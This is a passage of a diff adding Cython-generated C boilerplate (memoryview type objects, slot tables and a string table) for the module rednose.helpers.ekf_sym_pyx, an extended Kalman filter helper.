Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE|Py_TPFLAGS_HAVE_GC, + __pyx_type___pyx_memoryview_slots, +}; +#else + +static PySequenceMethods __pyx_tp_as_sequence_memoryview = { + __pyx_memoryview___len__, /*sq_length*/ + 0, /*sq_concat*/ + 0, /*sq_repeat*/ + __pyx_sq_item_memoryview, /*sq_item*/ + 0, /*sq_slice*/ + 0, /*sq_ass_item*/ + 0, /*sq_ass_slice*/ + 0, /*sq_contains*/ + 0, /*sq_inplace_concat*/ + 0, /*sq_inplace_repeat*/ +}; + +static PyMappingMethods __pyx_tp_as_mapping_memoryview = { + __pyx_memoryview___len__, /*mp_length*/ + __pyx_memoryview___getitem__, /*mp_subscript*/ + __pyx_mp_ass_subscript_memoryview, /*mp_ass_subscript*/ +}; + +static PyBufferProcs __pyx_tp_as_buffer_memoryview = { + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getreadbuffer*/ + #endif + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getwritebuffer*/ + #endif + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getsegcount*/ + #endif + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getcharbuffer*/ + #endif + __pyx_memoryview_getbuffer, /*bf_getbuffer*/ + 0, /*bf_releasebuffer*/ +}; + +static PyTypeObject __pyx_type___pyx_memoryview = { + PyVarObject_HEAD_INIT(0, 0) + "rednose.helpers.ekf_sym_pyx.""memoryview", /*tp_name*/ + sizeof(struct __pyx_memoryview_obj), /*tp_basicsize*/ + 0, /*tp_itemsize*/ + __pyx_tp_dealloc_memoryview, /*tp_dealloc*/ + #if PY_VERSION_HEX < 0x030800b4 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030800b4 + 0, /*tp_vectorcall_offset*/ + #endif + 0, /*tp_getattr*/ + 0, /*tp_setattr*/ + #if PY_MAJOR_VERSION < 3 + 0, /*tp_compare*/ + #endif + #if PY_MAJOR_VERSION >= 3 + 0, /*tp_as_async*/ + #endif + __pyx_memoryview___repr__, /*tp_repr*/ + 0, /*tp_as_number*/ + &__pyx_tp_as_sequence_memoryview, /*tp_as_sequence*/ + &__pyx_tp_as_mapping_memoryview, /*tp_as_mapping*/ + 0, /*tp_hash*/ + 0, /*tp_call*/ + __pyx_memoryview___str__, /*tp_str*/ + 0, /*tp_getattro*/ + 0, /*tp_setattro*/ + &__pyx_tp_as_buffer_memoryview, /*tp_as_buffer*/ + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE|Py_TPFLAGS_HAVE_GC, /*tp_flags*/ + 0, /*tp_doc*/ + __pyx_tp_traverse_memoryview, /*tp_traverse*/ + __pyx_tp_clear_memoryview, /*tp_clear*/ + 0, /*tp_richcompare*/ + 0, /*tp_weaklistoffset*/ + 0, /*tp_iter*/ + 0, /*tp_iternext*/ + __pyx_methods_memoryview, /*tp_methods*/ + 0, /*tp_members*/ + __pyx_getsets_memoryview, /*tp_getset*/ + 0, /*tp_base*/ + 0, /*tp_dict*/ + 0, /*tp_descr_get*/ + 0, /*tp_descr_set*/ + #if !CYTHON_USE_TYPE_SPECS + 0, /*tp_dictoffset*/ + #endif + 0, /*tp_init*/ + 0, /*tp_alloc*/ + __pyx_tp_new_memoryview, /*tp_new*/ + 0, /*tp_free*/ + 0, /*tp_is_gc*/ + 0, /*tp_bases*/ + 0, /*tp_mro*/ + 0, /*tp_cache*/ + 0, /*tp_subclasses*/ + 0, /*tp_weaklist*/ + 0, /*tp_del*/ + 0, /*tp_version_tag*/ + #if PY_VERSION_HEX >= 0x030400a1 + #if CYTHON_USE_TP_FINALIZE + 0, /*tp_finalize*/ + #else + NULL, /*tp_finalize*/ + #endif + #endif + #if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) + 0, /*tp_vectorcall*/ + #endif + #if __PYX_NEED_TP_PRINT_SLOT == 1 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030C0000 + 0, /*tp_watched*/ + #endif + #if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 + 0, /*tp_pypy_flags*/ + #endif +}; +#endif +static struct __pyx_vtabstruct__memoryviewslice __pyx_vtable__memoryviewslice; + +static PyObject *__pyx_tp_new__memoryviewslice(PyTypeObject *t, PyObject *a, PyObject *k) { + struct __pyx_memoryviewslice_obj *p; + PyObject *o = __pyx_tp_new_memoryview(t, a, k); + if (unlikely(!o)) return 0; + p = ((struct __pyx_memoryviewslice_obj *)o); + p->__pyx_base.__pyx_vtab = (struct __pyx_vtabstruct_memoryview*)__pyx_vtabptr__memoryviewslice; + new((void*)&(p->from_slice)) __Pyx_memviewslice(); + p->from_object = Py_None; Py_INCREF(Py_None); + p->from_slice.memview = NULL; + return o; +} + +static void __pyx_tp_dealloc__memoryviewslice(PyObject *o) { + struct __pyx_memoryviewslice_obj *p = (struct __pyx_memoryviewslice_obj *)o; + #if CYTHON_USE_TP_FINALIZE + if (unlikely((PY_VERSION_HEX >= 0x03080000 || __Pyx_PyType_HasFeature(Py_TYPE(o), Py_TPFLAGS_HAVE_FINALIZE)) && __Pyx_PyObject_GetSlot(o, tp_finalize, destructor)) && !__Pyx_PyObject_GC_IsFinalized(o)) { + if (__Pyx_PyObject_GetSlot(o, tp_dealloc, destructor) == __pyx_tp_dealloc__memoryviewslice) { + if (PyObject_CallFinalizerFromDealloc(o)) return; + } + } + #endif + PyObject_GC_UnTrack(o); + { + PyObject *etype, *eval, *etb; + PyErr_Fetch(&etype, &eval, &etb); + __Pyx_SET_REFCNT(o, Py_REFCNT(o) + 1); + __pyx_memoryviewslice___dealloc__(o); + __Pyx_SET_REFCNT(o, Py_REFCNT(o) - 1); + PyErr_Restore(etype, eval, etb); + } + __Pyx_call_destructor(p->from_slice); + Py_CLEAR(p->from_object); + PyObject_GC_Track(o); + __pyx_tp_dealloc_memoryview(o); +} + +static int __pyx_tp_traverse__memoryviewslice(PyObject *o, visitproc v, void *a) { + int e; + struct __pyx_memoryviewslice_obj *p = (struct __pyx_memoryviewslice_obj *)o; + e = __pyx_tp_traverse_memoryview(o, v, a); if (e) return e; + if (p->from_object) { + e = (*v)(p->from_object, a); if (e) return e; + } + return 0; +} + +static int __pyx_tp_clear__memoryviewslice(PyObject *o) { + PyObject* tmp; + struct __pyx_memoryviewslice_obj *p = (struct __pyx_memoryviewslice_obj *)o; + __pyx_tp_clear_memoryview(o); + tmp = ((PyObject*)p->from_object); + p->from_object = Py_None; Py_INCREF(Py_None); + Py_XDECREF(tmp); + __PYX_XCLEAR_MEMVIEW(&p->from_slice, 1); + return 0; +} + +static PyMethodDef __pyx_methods__memoryviewslice[] = { + {"__reduce_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw___pyx_memoryviewslice_1__reduce_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"__setstate_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw___pyx_memoryviewslice_3__setstate_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {0, 0, 0, 0} +}; +#if CYTHON_USE_TYPE_SPECS +static PyType_Slot __pyx_type___pyx_memoryviewslice_slots[] = { + {Py_tp_dealloc, (void *)__pyx_tp_dealloc__memoryviewslice}, + {Py_tp_doc, (void *)PyDoc_STR("Internal class for passing memoryview slices to Python")}, + {Py_tp_traverse, (void *)__pyx_tp_traverse__memoryviewslice}, + {Py_tp_clear, (void *)__pyx_tp_clear__memoryviewslice}, + {Py_tp_methods, (void *)__pyx_methods__memoryviewslice}, + {Py_tp_new, (void *)__pyx_tp_new__memoryviewslice}, + {0, 0}, +}; +static PyType_Spec __pyx_type___pyx_memoryviewslice_spec = { + "rednose.helpers.ekf_sym_pyx._memoryviewslice", + sizeof(struct __pyx_memoryviewslice_obj), + 0, + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE|Py_TPFLAGS_HAVE_GC|Py_TPFLAGS_SEQUENCE, + __pyx_type___pyx_memoryviewslice_slots, +}; +#else + +static PyTypeObject __pyx_type___pyx_memoryviewslice = { + PyVarObject_HEAD_INIT(0, 0) + "rednose.helpers.ekf_sym_pyx.""_memoryviewslice", /*tp_name*/ + sizeof(struct __pyx_memoryviewslice_obj), /*tp_basicsize*/ + 0, /*tp_itemsize*/ + __pyx_tp_dealloc__memoryviewslice, /*tp_dealloc*/ + #if PY_VERSION_HEX < 0x030800b4 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030800b4 + 0, /*tp_vectorcall_offset*/ + #endif + 0, /*tp_getattr*/ + 0, /*tp_setattr*/ + #if PY_MAJOR_VERSION < 3 + 0, /*tp_compare*/ + #endif + #if PY_MAJOR_VERSION >= 3 + 0, /*tp_as_async*/ + #endif + #if CYTHON_COMPILING_IN_PYPY || 0 + __pyx_memoryview___repr__, /*tp_repr*/ + #else + 0, /*tp_repr*/ + #endif + 0, /*tp_as_number*/ + 0, /*tp_as_sequence*/ + 0, /*tp_as_mapping*/ + 0, /*tp_hash*/ + 0, /*tp_call*/ + #if CYTHON_COMPILING_IN_PYPY || 0 + __pyx_memoryview___str__, /*tp_str*/ + #else + 0, /*tp_str*/ + #endif + 0, /*tp_getattro*/ + 0, /*tp_setattro*/ + 0, /*tp_as_buffer*/ + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE|Py_TPFLAGS_HAVE_GC|Py_TPFLAGS_SEQUENCE, /*tp_flags*/ + PyDoc_STR("Internal class for passing memoryview slices to Python"), /*tp_doc*/ + __pyx_tp_traverse__memoryviewslice, /*tp_traverse*/ + __pyx_tp_clear__memoryviewslice, /*tp_clear*/ + 0, /*tp_richcompare*/ + 0, /*tp_weaklistoffset*/ + 0, /*tp_iter*/ + 0, /*tp_iternext*/ + __pyx_methods__memoryviewslice, /*tp_methods*/ + 0, /*tp_members*/ + 0, /*tp_getset*/ + 0, /*tp_base*/ + 0, /*tp_dict*/ + 0, /*tp_descr_get*/ + 0, /*tp_descr_set*/ + #if !CYTHON_USE_TYPE_SPECS + 0, /*tp_dictoffset*/ + #endif + 0, /*tp_init*/ + 0, /*tp_alloc*/ + __pyx_tp_new__memoryviewslice, /*tp_new*/ + 0, /*tp_free*/ + 0, /*tp_is_gc*/ + 0, /*tp_bases*/ + 0, /*tp_mro*/ + 0, /*tp_cache*/ + 0, /*tp_subclasses*/ + 0, /*tp_weaklist*/ + 0, /*tp_del*/ + 0, /*tp_version_tag*/ + #if PY_VERSION_HEX >= 0x030400a1 + #if CYTHON_USE_TP_FINALIZE + 0, /*tp_finalize*/ + #else + NULL, /*tp_finalize*/ + #endif + #endif + #if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) + 0, /*tp_vectorcall*/ + #endif + #if __PYX_NEED_TP_PRINT_SLOT == 1 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030C0000 + 0, /*tp_watched*/ + #endif + #if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 + 0, /*tp_pypy_flags*/ + #endif +}; +#endif + +static PyMethodDef __pyx_methods[] = { + {0, 0, 0, 0} +}; +#ifndef CYTHON_SMALL_CODE +#if defined(__clang__) + #define CYTHON_SMALL_CODE +#elif defined(__GNUC__) && (__GNUC__ > 4 || (__GNUC__ == 4 && __GNUC_MINOR__ >= 3)) + #define CYTHON_SMALL_CODE __attribute__((cold)) +#else + #define CYTHON_SMALL_CODE +#endif +#endif +/* #### Code section: pystring_table ### */ + +static int __Pyx_CreateStringTabAndInitStrings(void) { + __Pyx_StringTabEntry __pyx_string_tab[] = { + {&__pyx_kp_u_, __pyx_k_, sizeof(__pyx_k_), 0, 1, 0, 0}, + {&__pyx_n_s_ASCII, __pyx_k_ASCII, sizeof(__pyx_k_ASCII), 0, 0, 1, 1}, + {&__pyx_kp_s_All_dimensions_preceding_dimensi, __pyx_k_All_dimensions_preceding_dimensi, sizeof(__pyx_k_All_dimensions_preceding_dimensi), 0, 0, 1, 0}, + {&__pyx_n_s_AssertionError, __pyx_k_AssertionError, sizeof(__pyx_k_AssertionError), 0, 0, 1, 1}, + {&__pyx_kp_s_Buffer_view_does_not_expose_stri, __pyx_k_Buffer_view_does_not_expose_stri, sizeof(__pyx_k_Buffer_view_does_not_expose_stri), 0, 0, 1, 0}, + {&__pyx_n_u_C, __pyx_k_C, sizeof(__pyx_k_C), 0, 1, 0, 1}, + {&__pyx_kp_s_Can_only_create_a_buffer_that_is, __pyx_k_Can_only_create_a_buffer_that_is, sizeof(__pyx_k_Can_only_create_a_buffer_that_is), 0, 0, 1, 0}, + {&__pyx_kp_s_Cannot_assign_to_read_only_memor, __pyx_k_Cannot_assign_to_read_only_memor, sizeof(__pyx_k_Cannot_assign_to_read_only_memor), 0, 0, 1, 0}, + {&__pyx_kp_s_Cannot_create_writable_memory_vi, __pyx_k_Cannot_create_writable_memory_vi, sizeof(__pyx_k_Cannot_create_writable_memory_vi), 0, 0, 1, 0}, + {&__pyx_kp_u_Cannot_index_with_type, __pyx_k_Cannot_index_with_type, sizeof(__pyx_k_Cannot_index_with_type), 0, 1, 0, 0}, + {&__pyx_kp_s_Cannot_transpose_memoryview_with, __pyx_k_Cannot_transpose_memoryview_with, sizeof(__pyx_k_Cannot_transpose_memoryview_with), 0, 0, 1, 0}, + {&__pyx_kp_s_Dimension_d_is_not_direct, __pyx_k_Dimension_d_is_not_direct, sizeof(__pyx_k_Dimension_d_is_not_direct), 0, 0, 1, 0}, + {&__pyx_n_s_EKF_sym_pyx, __pyx_k_EKF_sym_pyx, sizeof(__pyx_k_EKF_sym_pyx), 0, 0, 1, 1}, + {&__pyx_n_s_EKF_sym_pyx___reduce_cython, __pyx_k_EKF_sym_pyx___reduce_cython, sizeof(__pyx_k_EKF_sym_pyx___reduce_cython), 0, 0, 1, 1}, + {&__pyx_n_s_EKF_sym_pyx___setstate_cython, __pyx_k_EKF_sym_pyx___setstate_cython, sizeof(__pyx_k_EKF_sym_pyx___setstate_cython), 0, 0, 1, 1}, + {&__pyx_n_s_EKF_sym_pyx_augment, __pyx_k_EKF_sym_pyx_augment, sizeof(__pyx_k_EKF_sym_pyx_augment), 0, 0, 1, 1}, + {&__pyx_n_s_EKF_sym_pyx_covs, __pyx_k_EKF_sym_pyx_covs, sizeof(__pyx_k_EKF_sym_pyx_covs), 0, 0, 1, 1}, + {&__pyx_n_s_EKF_sym_pyx_get_augment_times, __pyx_k_EKF_sym_pyx_get_augment_times, sizeof(__pyx_k_EKF_sym_pyx_get_augment_times), 0, 0, 1, 1}, + {&__pyx_n_s_EKF_sym_pyx_get_filter_time, __pyx_k_EKF_sym_pyx_get_filter_time, sizeof(__pyx_k_EKF_sym_pyx_get_filter_time), 0, 0, 1, 1}, + {&__pyx_n_s_EKF_sym_pyx_init_state, __pyx_k_EKF_sym_pyx_init_state, sizeof(__pyx_k_EKF_sym_pyx_init_state), 0, 0, 1, 1}, + {&__pyx_n_s_EKF_sym_pyx_maha_test, __pyx_k_EKF_sym_pyx_maha_test, sizeof(__pyx_k_EKF_sym_pyx_maha_test), 0, 0, 1, 1}, + {&__pyx_n_s_EKF_sym_pyx_predict, __pyx_k_EKF_sym_pyx_predict, sizeof(__pyx_k_EKF_sym_pyx_predict), 0, 0, 1, 1}, + {&__pyx_n_s_EKF_sym_pyx_predict_and_update_b, __pyx_k_EKF_sym_pyx_predict_and_update_b, sizeof(__pyx_k_EKF_sym_pyx_predict_and_update_b), 0, 0, 1, 1}, + {&__pyx_n_s_EKF_sym_pyx_reset_rewind, __pyx_k_EKF_sym_pyx_reset_rewind, sizeof(__pyx_k_EKF_sym_pyx_reset_rewind), 0, 0, 1, 1}, + {&__pyx_n_s_EKF_sym_pyx_rts_smooth, __pyx_k_EKF_sym_pyx_rts_smooth, sizeof(__pyx_k_EKF_sym_pyx_rts_smooth), 0, 0, 1, 1}, + {&__pyx_n_s_EKF_sym_pyx_set_filter_time, __pyx_k_EKF_sym_pyx_set_filter_time, sizeof(__pyx_k_EKF_sym_pyx_set_filter_time), 0, 0, 1, 1}, + {&__pyx_n_s_EKF_sym_pyx_set_global, __pyx_k_EKF_sym_pyx_set_global, sizeof(__pyx_k_EKF_sym_pyx_set_global), 0, 0, 1, 1}, + {&__pyx_n_s_EKF_sym_pyx_state, __pyx_k_EKF_sym_pyx_state, sizeof(__pyx_k_EKF_sym_pyx_state), 0, 0, 1, 1}, + {&__pyx_n_s_Ellipsis, __pyx_k_Ellipsis, sizeof(__pyx_k_Ellipsis), 0, 0, 1, 1}, + {&__pyx_kp_s_Empty_shape_tuple_for_cython_arr, __pyx_k_Empty_shape_tuple_for_cython_arr, sizeof(__pyx_k_Empty_shape_tuple_for_cython_arr), 0, 0, 1, 0}, + {&__pyx_n_s_ImportError, __pyx_k_ImportError, sizeof(__pyx_k_ImportError), 0, 0, 1, 1}, + {&__pyx_kp_s_Incompatible_checksums_0x_x_vs_0, __pyx_k_Incompatible_checksums_0x_x_vs_0, sizeof(__pyx_k_Incompatible_checksums_0x_x_vs_0), 0, 0, 1, 0}, + {&__pyx_n_s_IndexError, __pyx_k_IndexError, sizeof(__pyx_k_IndexError), 0, 0, 1, 1}, + {&__pyx_kp_s_Index_out_of_bounds_axis_d, __pyx_k_Index_out_of_bounds_axis_d, sizeof(__pyx_k_Index_out_of_bounds_axis_d), 0, 0, 1, 0}, + {&__pyx_kp_s_Indirect_dimensions_not_supporte, __pyx_k_Indirect_dimensions_not_supporte, sizeof(__pyx_k_Indirect_dimensions_not_supporte), 0, 0, 1, 0}, + {&__pyx_kp_u_Invalid_mode_expected_c_or_fortr, __pyx_k_Invalid_mode_expected_c_or_fortr, sizeof(__pyx_k_Invalid_mode_expected_c_or_fortr), 0, 1, 0, 0}, + {&__pyx_kp_u_Invalid_shape_in_axis, __pyx_k_Invalid_shape_in_axis, sizeof(__pyx_k_Invalid_shape_in_axis), 0, 1, 0, 0}, + {&__pyx_n_s_MemoryError, __pyx_k_MemoryError, sizeof(__pyx_k_MemoryError), 0, 0, 1, 1}, + {&__pyx_kp_s_MemoryView_of_r_at_0x_x, __pyx_k_MemoryView_of_r_at_0x_x, sizeof(__pyx_k_MemoryView_of_r_at_0x_x), 0, 0, 1, 0}, + {&__pyx_kp_s_MemoryView_of_r_object, __pyx_k_MemoryView_of_r_object, sizeof(__pyx_k_MemoryView_of_r_object), 0, 0, 1, 0}, + {&__pyx_n_s_N, __pyx_k_N, sizeof(__pyx_k_N), 0, 0, 1, 1}, + {&__pyx_n_s_NotImplementedError, __pyx_k_NotImplementedError, sizeof(__pyx_k_NotImplementedError), 0, 0, 1, 1}, + {&__pyx_n_b_O, __pyx_k_O, sizeof(__pyx_k_O), 0, 0, 0, 1}, + {&__pyx_kp_u_Out_of_bounds_on_buffer_access_a, __pyx_k_Out_of_bounds_on_buffer_access_a, sizeof(__pyx_k_Out_of_bounds_on_buffer_access_a), 0, 1, 0, 0}, + {&__pyx_n_s_P, __pyx_k_P, sizeof(__pyx_k_P), 0, 0, 1, 1}, + {&__pyx_n_s_P_initial, __pyx_k_P_initial, sizeof(__pyx_k_P_initial), 0, 0, 1, 1}, + {&__pyx_n_s_PickleError, __pyx_k_PickleError, sizeof(__pyx_k_PickleError), 0, 0, 1, 1}, + {&__pyx_n_s_Q, __pyx_k_Q, sizeof(__pyx_k_Q), 0, 0, 1, 1}, + {&__pyx_n_s_R, __pyx_k_R, sizeof(__pyx_k_R), 0, 0, 1, 1}, + {&__pyx_n_s_R_map, __pyx_k_R_map, sizeof(__pyx_k_R_map), 0, 0, 1, 1}, + {&__pyx_n_s_Ri, __pyx_k_Ri, sizeof(__pyx_k_Ri), 0, 0, 1, 1}, + {&__pyx_n_s_Ri_b, __pyx_k_Ri_b, sizeof(__pyx_k_Ri_b), 0, 0, 1, 1}, + {&__pyx_n_s_Sequence, __pyx_k_Sequence, sizeof(__pyx_k_Sequence), 0, 0, 1, 1}, + {&__pyx_kp_s_Step_may_not_be_zero_axis_d, __pyx_k_Step_may_not_be_zero_axis_d, sizeof(__pyx_k_Step_may_not_be_zero_axis_d), 0, 0, 1, 0}, + {&__pyx_kp_b_T, __pyx_k_T, sizeof(__pyx_k_T), 0, 0, 0, 0}, + {&__pyx_n_s_TypeError, __pyx_k_TypeError, sizeof(__pyx_k_TypeError), 0, 0, 1, 1}, + {&__pyx_kp_s_Unable_to_convert_item_to_object, __pyx_k_Unable_to_convert_item_to_object, sizeof(__pyx_k_Unable_to_convert_item_to_object), 0, 0, 1, 0}, + {&__pyx_n_s_ValueError, __pyx_k_ValueError, sizeof(__pyx_k_ValueError), 0, 0, 1, 1}, + {&__pyx_n_s_View_MemoryView, __pyx_k_View_MemoryView, sizeof(__pyx_k_View_MemoryView), 0, 0, 1, 1}, + {&__pyx_kp_b__10, __pyx_k__10, sizeof(__pyx_k__10), 0, 0, 0, 0}, + {&__pyx_kp_b__11, __pyx_k__11, sizeof(__pyx_k__11), 0, 0, 0, 0}, + {&__pyx_kp_b__12, __pyx_k__12, sizeof(__pyx_k__12), 0, 0, 0, 0}, + {&__pyx_kp_u__13, __pyx_k__13, sizeof(__pyx_k__13), 0, 1, 0, 0}, + {&__pyx_kp_u__14, __pyx_k__14, sizeof(__pyx_k__14), 0, 1, 0, 0}, + {&__pyx_kp_u__2, __pyx_k__2, sizeof(__pyx_k__2), 0, 1, 0, 0}, + {&__pyx_n_s__3, __pyx_k__3, sizeof(__pyx_k__3), 0, 0, 1, 1}, + {&__pyx_n_s__58, __pyx_k__58, sizeof(__pyx_k__58), 0, 0, 1, 1}, + {&__pyx_kp_u__6, __pyx_k__6, sizeof(__pyx_k__6), 0, 1, 0, 0}, + {&__pyx_kp_u__7, __pyx_k__7, sizeof(__pyx_k__7), 0, 1, 0, 0}, + {&__pyx_kp_b__9, __pyx_k__9, sizeof(__pyx_k__9), 0, 0, 0, 0}, + {&__pyx_n_s_a, __pyx_k_a, sizeof(__pyx_k_a), 0, 0, 1, 1}, + {&__pyx_n_s_abc, __pyx_k_abc, sizeof(__pyx_k_abc), 0, 0, 1, 1}, + {&__pyx_n_s_allocate_buffer, __pyx_k_allocate_buffer, sizeof(__pyx_k_allocate_buffer), 0, 0, 1, 1}, + {&__pyx_kp_u_and, __pyx_k_and, sizeof(__pyx_k_and), 0, 1, 0, 0}, + {&__pyx_n_s_args, __pyx_k_args, sizeof(__pyx_k_args), 0, 0, 1, 1}, + {&__pyx_n_s_args_map, __pyx_k_args_map, sizeof(__pyx_k_args_map), 0, 0, 1, 1}, + {&__pyx_n_s_asarray, __pyx_k_asarray, sizeof(__pyx_k_asarray), 0, 0, 1, 1}, + {&__pyx_n_s_ascontiguousarray, __pyx_k_ascontiguousarray, sizeof(__pyx_k_ascontiguousarray), 0, 0, 1, 1}, + {&__pyx_n_s_asyncio_coroutines, __pyx_k_asyncio_coroutines, sizeof(__pyx_k_asyncio_coroutines), 0, 0, 1, 1}, + {&__pyx_n_s_augment, __pyx_k_augment, sizeof(__pyx_k_augment), 0, 0, 1, 1}, + {&__pyx_n_s_base, __pyx_k_base, sizeof(__pyx_k_base), 0, 0, 1, 1}, + {&__pyx_n_s_c, __pyx_k_c, sizeof(__pyx_k_c), 0, 0, 1, 1}, + {&__pyx_n_u_c, __pyx_k_c, sizeof(__pyx_k_c), 0, 1, 0, 1}, + {&__pyx_n_s_class, __pyx_k_class, sizeof(__pyx_k_class), 0, 0, 1, 1}, + {&__pyx_n_s_class_getitem, __pyx_k_class_getitem, sizeof(__pyx_k_class_getitem), 0, 0, 1, 1}, + {&__pyx_n_s_cline_in_traceback, __pyx_k_cline_in_traceback, sizeof(__pyx_k_cline_in_traceback), 0, 0, 1, 1}, + {&__pyx_n_s_collections, __pyx_k_collections, sizeof(__pyx_k_collections), 0, 0, 1, 1}, + {&__pyx_kp_s_collections_abc, __pyx_k_collections_abc, sizeof(__pyx_k_collections_abc), 0, 0, 1, 0}, + {&__pyx_kp_s_contiguous_and_direct, __pyx_k_contiguous_and_direct, sizeof(__pyx_k_contiguous_and_direct), 0, 0, 1, 0}, + {&__pyx_kp_s_contiguous_and_indirect, __pyx_k_contiguous_and_indirect, sizeof(__pyx_k_contiguous_and_indirect), 0, 0, 1, 0}, + {&__pyx_n_s_copy, __pyx_k_copy, sizeof(__pyx_k_copy), 0, 0, 1, 1}, + {&__pyx_n_s_count, __pyx_k_count, sizeof(__pyx_k_count), 0, 0, 1, 1}, + {&__pyx_n_s_covs, __pyx_k_covs, sizeof(__pyx_k_covs), 0, 0, 1, 1}, + {&__pyx_n_s_covs_b, __pyx_k_covs_b, sizeof(__pyx_k_covs_b), 0, 0, 1, 1}, + {&__pyx_n_s_dict, __pyx_k_dict, sizeof(__pyx_k_dict), 0, 0, 1, 1}, + {&__pyx_n_s_dim_augment, __pyx_k_dim_augment, sizeof(__pyx_k_dim_augment), 0, 0, 1, 1}, + {&__pyx_n_s_dim_augment_err, __pyx_k_dim_augment_err, sizeof(__pyx_k_dim_augment_err), 0, 0, 1, 1}, + {&__pyx_n_s_dim_main, __pyx_k_dim_main, sizeof(__pyx_k_dim_main), 0, 0, 1, 1}, + {&__pyx_n_s_dim_main_err, __pyx_k_dim_main_err, sizeof(__pyx_k_dim_main_err), 0, 0, 1, 1}, + {&__pyx_kp_u_disable, __pyx_k_disable, sizeof(__pyx_k_disable), 0, 1, 0, 0}, + {&__pyx_n_s_double, __pyx_k_double, sizeof(__pyx_k_double), 0, 0, 1, 1}, + {&__pyx_n_s_dtype, __pyx_k_dtype, sizeof(__pyx_k_dtype), 0, 0, 1, 1}, + {&__pyx_n_s_dtype_is_object, __pyx_k_dtype_is_object, sizeof(__pyx_k_dtype_is_object), 0, 0, 1, 1}, + {&__pyx_kp_u_enable, __pyx_k_enable, sizeof(__pyx_k_enable), 0, 1, 0, 0}, + {&__pyx_n_s_encode, __pyx_k_encode, sizeof(__pyx_k_encode), 0, 0, 1, 1}, + {&__pyx_n_s_enumerate, __pyx_k_enumerate, sizeof(__pyx_k_enumerate), 0, 0, 1, 1}, + {&__pyx_n_s_error, __pyx_k_error, sizeof(__pyx_k_error), 0, 0, 1, 1}, + {&__pyx_n_s_estimates, __pyx_k_estimates, sizeof(__pyx_k_estimates), 0, 0, 1, 1}, + {&__pyx_n_s_extra_args, __pyx_k_extra_args, sizeof(__pyx_k_extra_args), 0, 0, 1, 1}, + {&__pyx_n_s_extra_args_map, __pyx_k_extra_args_map, sizeof(__pyx_k_extra_args_map), 0, 0, 1, 1}, + {&__pyx_n_s_filter_time, __pyx_k_filter_time, sizeof(__pyx_k_filter_time), 0, 0, 1, 1}, + {&__pyx_n_s_flags, __pyx_k_flags, sizeof(__pyx_k_flags), 0, 0, 1, 1}, + {&__pyx_n_s_format, __pyx_k_format, sizeof(__pyx_k_format), 0, 0, 1, 1}, + {&__pyx_n_s_fortran, __pyx_k_fortran, sizeof(__pyx_k_fortran), 0, 0, 1, 1}, + {&__pyx_n_u_fortran, __pyx_k_fortran, sizeof(__pyx_k_fortran), 0, 1, 0, 1}, + {&__pyx_kp_u_gc, __pyx_k_gc, sizeof(__pyx_k_gc), 0, 1, 0, 0}, + {&__pyx_n_s_gen_dir, __pyx_k_gen_dir, sizeof(__pyx_k_gen_dir), 0, 0, 1, 1}, + {&__pyx_n_s_get_augment_times, __pyx_k_get_augment_times, sizeof(__pyx_k_get_augment_times), 0, 0, 1, 1}, + {&__pyx_n_s_get_filter_time, __pyx_k_get_filter_time, sizeof(__pyx_k_get_filter_time), 0, 0, 1, 1}, + {&__pyx_n_s_getstate, __pyx_k_getstate, sizeof(__pyx_k_getstate), 0, 0, 1, 1}, + {&__pyx_n_s_global_var, __pyx_k_global_var, sizeof(__pyx_k_global_var), 0, 0, 1, 1}, + {&__pyx_n_s_global_vars, __pyx_k_global_vars, sizeof(__pyx_k_global_vars), 0, 0, 1, 1}, + {&__pyx_kp_u_got, __pyx_k_got, sizeof(__pyx_k_got), 0, 1, 0, 0}, + {&__pyx_kp_u_got_differing_extents_in_dimensi, __pyx_k_got_differing_extents_in_dimensi, sizeof(__pyx_k_got_differing_extents_in_dimensi), 0, 1, 0, 0}, + {&__pyx_n_s_id, __pyx_k_id, sizeof(__pyx_k_id), 0, 0, 1, 1}, + {&__pyx_n_s_import, __pyx_k_import, sizeof(__pyx_k_import), 0, 0, 1, 1}, + {&__pyx_n_s_index, __pyx_k_index, sizeof(__pyx_k_index), 0, 0, 1, 1}, + {&__pyx_n_s_init_state, __pyx_k_init_state, sizeof(__pyx_k_init_state), 0, 0, 1, 1}, + {&__pyx_n_s_initializing, __pyx_k_initializing, sizeof(__pyx_k_initializing), 0, 0, 1, 1}, + {&__pyx_n_s_is_coroutine, __pyx_k_is_coroutine, sizeof(__pyx_k_is_coroutine), 0, 0, 1, 1}, + {&__pyx_kp_u_isenabled, __pyx_k_isenabled, 